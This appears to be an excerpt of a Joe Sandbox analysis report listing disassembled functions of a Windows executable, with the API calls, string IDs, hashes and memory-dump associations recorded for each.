                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                                • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                                • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                                Function 0040DE10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EmptyRect
                                                                                                                                                                                                                                                                                                • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                                • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                                • Opcode ID: bc3e2d6f8ce831d7bf007855c4c2d232e2bdea8988ba371b820240db3263b0bd
                                                                                                                                                                                                                                                                                                • Instruction ID: ef19d2a367d3f1db560aaf5cf05e81b0258e296f30c95c9ac20d7302b86fa88f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc3e2d6f8ce831d7bf007855c4c2d232e2bdea8988ba371b820240db3263b0bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611ABB1A447119BD3109F56CC42B97B6E8EB48B24F108A2FF519E72C1D7BC680447DD
                                                                                                                                                                                                                                                                                                Function 0046C4F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                                Function 0041E1D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                                • mciGetErrorStringW.WINMM(00000000,?,00000080), ref: 0041E23D
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                                • String ID: %s/n
                                                                                                                                                                                                                                                                                                • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                                • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                                Function 004014C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50filewindowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                                • String ID: >=
                                                                                                                                                                                                                                                                                                • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                                • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                                Function 00415240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415319,?,?,1088D068,?,?,00000000,1088D068,?,1088D068,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                                • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                                Function 004153C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415489,?,?,1088D068,?,?,00000000,004070E8,?,1088D068,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                                • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                                Function 00403D90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00403E46,?,?,1088D068), ref: 00403DA0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00403DB1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_AddMasked
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-822293376
